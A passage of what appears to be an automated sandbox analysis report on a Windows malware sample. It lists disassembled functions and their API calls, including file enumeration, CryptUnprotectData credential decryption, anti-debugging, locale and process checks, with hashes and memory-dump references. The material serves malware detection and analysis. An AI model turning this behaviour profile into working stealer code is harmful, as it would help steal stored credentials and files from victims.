                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                            • String ID: P2#v$\*.*$1#v
                                                            • API String ID: 1415058207-2075649900
                                                            • Opcode ID: d559f7d923cef062890f90fad47e2c6b8fed7cb0666739647a07a7e1c0653bd7
                                                            • Instruction ID: c5f2092c2eee8a66a758d10c768ebed576f2ef5e0cbf1d229c3f39d4ef96c659
                                                            • Opcode Fuzzy Hash: d559f7d923cef062890f90fad47e2c6b8fed7cb0666739647a07a7e1c0653bd7
                                                            • Instruction Fuzzy Hash: B9120071950118FBEB15FB60CC9AAEE737CAF54300F4145A9B50A62091EF786F89CFA1
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                              • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                                                              • Part of subcall function 0074A920: lstrcatA.KERNEL32(00000000), ref: 0074A982
                                                              • Part of subcall function 0074A9B0: lstrlenA.KERNEL32(?,00751110,?,00000000,00750AEF), ref: 0074A9C5
                                                              • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                                                              • Part of subcall function 0074A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0074AA12
                                                              • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,u), ref: 0074A905
                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00750D73), ref: 0073E4A2
                                                            • StrCmpCA.SHLWAPI(?,007514F8), ref: 0073E4F2
                                                            • StrCmpCA.SHLWAPI(?,007514FC), ref: 0073E508
                                                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0073EBDF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                            • String ID: P2#v$\*.*$1#v$s
                                                            • API String ID: 433455689-4274704240
                                                            • Opcode ID: 030fde31bb561ad0405ec40c0629326822a3fe396391b50018f95b0f7d1d41d0
                                                            • Instruction ID: cf786f6fef99a9f092e015b018479db214e7fd5ad132aab0fd9619c08fc6108d
                                                            • Opcode Fuzzy Hash: 030fde31bb561ad0405ec40c0629326822a3fe396391b50018f95b0f7d1d41d0
                                                            • Instruction Fuzzy Hash: 7C125172950118FAEB15FB60DC9AEED737CAF54300F4145A8B50A96092EF386F49CF92
                                                            APIs
                                                              • Part of subcall function 0074A740: lstrcpy.KERNEL32(u,00000000), ref: 0074A788
                                                            • GetKeyboardLayoutList.USER32(00000000,00000000,007505AF), ref: 00747BE1
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 00747BF9
                                                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00747C0D
                                                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00747C62
                                                            • LocalFree.KERNEL32(00000000), ref: 00747D22
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                            • String ID: /
                                                            • API String ID: 3090951853-4001269591
                                                            • Opcode ID: 998b3c9c58f89d98ac63a233ca57142271bc6c82f6b5c821a3f921e3d1a3c696
                                                            • Instruction ID: 5b78bbf0b36a3c56ddd5966f168c2ca906036524e80e61ccc42a3cfe5c8dc36d
                                                            • Opcode Fuzzy Hash: 998b3c9c58f89d98ac63a233ca57142271bc6c82f6b5c821a3f921e3d1a3c696
                                                            • Instruction Fuzzy Hash: E9413C71954218EBDB24DF94DC99BEEB3B8FF44700F204199E50962291DB782F85CFA1
                                                            APIs
                                                            • memset.MSVCRT ref: 0073C853
                                                            • lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00FCD6A0), ref: 0073C871
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0073C87C
                                                            • memcpy.MSVCRT(?,?,?), ref: 0073C912
                                                            • lstrcatA.KERNEL32(?,00750B46), ref: 0073C943
                                                            • lstrcatA.KERNEL32(?,00750B47), ref: 0073C957
                                                            • lstrcatA.KERNEL32(?,00750B4E), ref: 0073C978
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
                                                            • String ID:
                                                            • API String ID: 1498829745-0
                                                            • Opcode ID: faa7237e97471ad7cce1bf5ad2ee23b09197e3ddbdce849733c805c814574a0e
                                                            • Instruction ID: 690275289c3e42ba2769a39bf309cc40b3d52d1e891c4ae0bf967dd30e28e304
                                                            • Opcode Fuzzy Hash: faa7237e97471ad7cce1bf5ad2ee23b09197e3ddbdce849733c805c814574a0e
                                                            • Instruction Fuzzy Hash: 394172B5D1421ADFDB10DFA4DD89BEEB7B8BB84304F1041A8F509A7280D7B45A84DF92
                                                            APIs
                                                            • GetSystemTime.KERNEL32(0075110C,?,?,00746B11,00000000,?,00FC1558,?,0075110C,?,00000000,?), ref: 0074696C
                                                            • sscanf.NTDLL ref: 00746999
                                                            • SystemTimeToFileTime.KERNEL32(0075110C,00000000,?,?,?,?,?,?,?,?,?,?,?,00FC1558,?,0075110C), ref: 007469B2
                                                            • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00FC1558,?,0075110C), ref: 007469C0
                                                            • ExitProcess.KERNEL32 ref: 007469DA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Time$System$File$ExitProcesssscanf
                                                            • String ID: u
                                                            • API String ID: 2533653975-1051851173
                                                            • Opcode ID: 2cffe91f5a23f85dcbb3391441ab475516813b84c5a60100008817753e81aa4e
                                                            • Instruction ID: a590447a1137de83b38ee085b756cbfcc6d1df2f235f3cada85a5abf35b3bc44
                                                            • Opcode Fuzzy Hash: 2cffe91f5a23f85dcbb3391441ab475516813b84c5a60100008817753e81aa4e
                                                            • Instruction Fuzzy Hash: 00210176D14208ABCF04EFE4D9499EEB7B9FF48300F04852EE41AE3250EB345605CB66
                                                            APIs
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739AEF
                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,00734EEE,00000000,?), ref: 00739B01
                                                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ns,00000000,00000000), ref: 00739B2A
                                                            • LocalFree.KERNEL32(?,?,?,?,00734EEE,00000000,?), ref: 00739B3F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BinaryCryptLocalString$AllocFree
                                                            • String ID: Ns
                                                            • API String ID: 4291131564-1137170065
                                                            • Opcode ID: 469c5e398c29fa6e40628de7327c9efbab003d73d52c27cb7c5cb8af02fdb27c
                                                            • Instruction ID: c4787a4aeeb88f3c8a88eaea842c65b36b23bca8c6babb5377c03c624cdceeb9
                                                            • Opcode Fuzzy Hash: 469c5e398c29fa6e40628de7327c9efbab003d73d52c27cb7c5cb8af02fdb27c
                                                            • Instruction Fuzzy Hash: 8911A4B4240208EFEB10CF64DC95FAAB7B5FB89700F208058FA199B390C7B5A941DB51
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32 ref: 0074BBA2
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0074BBB7
                                                            • UnhandledExceptionFilter.KERNEL32(0074F2A8), ref: 0074BBC2
                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0074BBDE
                                                            • TerminateProcess.KERNEL32(00000000), ref: 0074BBE5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                            • String ID:
                                                            • API String ID: 2579439406-0
                                                            • Opcode ID: 451c52817e231c4eeaf14ac0f368b2d1d0198b2cf1b2a75e188e3cfd29e903a4
                                                            • Instruction ID: 798aa962d04fc67b3453f59f978431bf7a936ec4805addd529815c5ef4fc47a0
                                                            • Opcode Fuzzy Hash: 451c52817e231c4eeaf14ac0f368b2d1d0198b2cf1b2a75e188e3cfd29e903a4
                                                            • Instruction Fuzzy Hash: 1221C6B55022049FDB42DF69ED88A943BF4BB08390F10941AE61D86270EBBC58C0CF29
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90), ref: 0073724D
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?), ref: 00737254
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00737281
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00737C90,80000001,007461C4), ref: 007372A4
                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,00737C90,80000001,007461C4,?,?,?,?,?,00737C90,?), ref: 007372AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                            • String ID:
                                                            • API String ID: 3657800372-0
                                                            • Opcode ID: 9b2f2218a0caf31854d1a07b332f1862ec9d398d86ed8195758daf5f58245808
                                                            • Instruction ID: 844faf56e5034fc5ca511bae41131f37904dbe9cdeba50e3db689475ce56314a
                                                            • Opcode Fuzzy Hash: 9b2f2218a0caf31854d1a07b332f1862ec9d398d86ed8195758daf5f58245808
                                                            • Instruction Fuzzy Hash: F30112B6B54208BBEB14DFD4CD46F9E7778FB44701F104154FB09AB2C0D6B4AA409BA6
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0074961E
                                                            • Process32First.KERNEL32(00750ACA,00000128), ref: 00749632
                                                            • Process32Next.KERNEL32(00750ACA,00000128), ref: 00749647
                                                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0074965C
                                                            • CloseHandle.KERNEL32(00750ACA), ref: 0074967A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            • Opcode ID: b9de195f4fe36f75f4a6f2583604b45f9907551fa65819e9a5843610ecefaa02
                                                            • Instruction ID: 1a4e9ef66a0bcef83310bf0bdff26d2a378712e78a38afbc0d164158f4b1a5ea
                                                            • Opcode Fuzzy Hash: b9de195f4fe36f75f4a6f2583604b45f9907551fa65819e9a5843610ecefaa02
                                                            • Instruction Fuzzy Hash: 99011E75A14208EBCB14DFA5CD48BEEB7F8EB48301F104188AA0997250D7349B80DF52
                                                            APIs
                                                            • CryptBinaryToStringA.CRYPT32(00000000,00735184,40000001,00000000,00000000,?,00735184), ref: 00748EC0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BinaryCryptString
                                                            • String ID:
                                                            • API String ID: 80407269-0
                                                            • Opcode ID: bfa811857441aaf199253551e278fb78883162fc4c8ad607e6bab394a637991e
                                                            • Instruction ID: 1b6171c79ca659d935af32f6afdddbf28650493005a91f96fd8cce8071886f46
                                                            • Opcode Fuzzy Hash: bfa811857441aaf199253551e278fb78883162fc4c8ad607e6bab394a637991e
                                                            • Instruction Fuzzy Hash: 64110675204208BFDB40CF64D884FAA33A9BF89700F109448F9198B250DB79E885EB62
                                                            APIs
                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00739B84
                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00739BA3
                                                            • memcpy.MSVCRT(?,?,?), ref: 00739BC6
                                                            • LocalFree.KERNEL32(?), ref: 00739BD3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                            • String ID:
                                                            • API String ID: 3243516280-0
                                                            • Opcode ID: fb07ca574a124fbae48c2419a1e548b398d793a57527001074cc813c93eb90ca
                                                            • Instruction ID: f1fe80db87adb250b2edf7381fab118d9b3174a9b7505320a279e61d49be1a1f
                                                            • Opcode Fuzzy Hash: fb07ca574a124fbae48c2419a1e548b398d793a57527001074cc813c93eb90ca
                                                            • Instruction Fuzzy Hash: 2E110CB8A00209DFDB04DF94D985AAEB7B9FF88300F104558F91997350D774AE50CF61
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00FD0480,00000000,?,00750E10,00000000,?,00000000,00000000), ref: 00747A63
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00FD0480,00000000,?,00750E10,00000000,?,00000000,00000000,?), ref: 00747A6A
                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00FD0480,00000000,?,00750E10,00000000,?,00000000,00000000,?), ref: 00747A7D
                                                            • wsprintfA.USER32 ref: 00747AB7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2158440996.0000000000731000.00000080.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                            • Associated: 00000000.00000002.2158425136.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158459656.000000000074E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158473174.000000000075B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000832000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.0000000000863000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158494218.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.000000000098C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2158618552.0000000000991000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_730000_BnxBRWQWhy.jbxd
                                                            Yara matches
                                                            Similarity
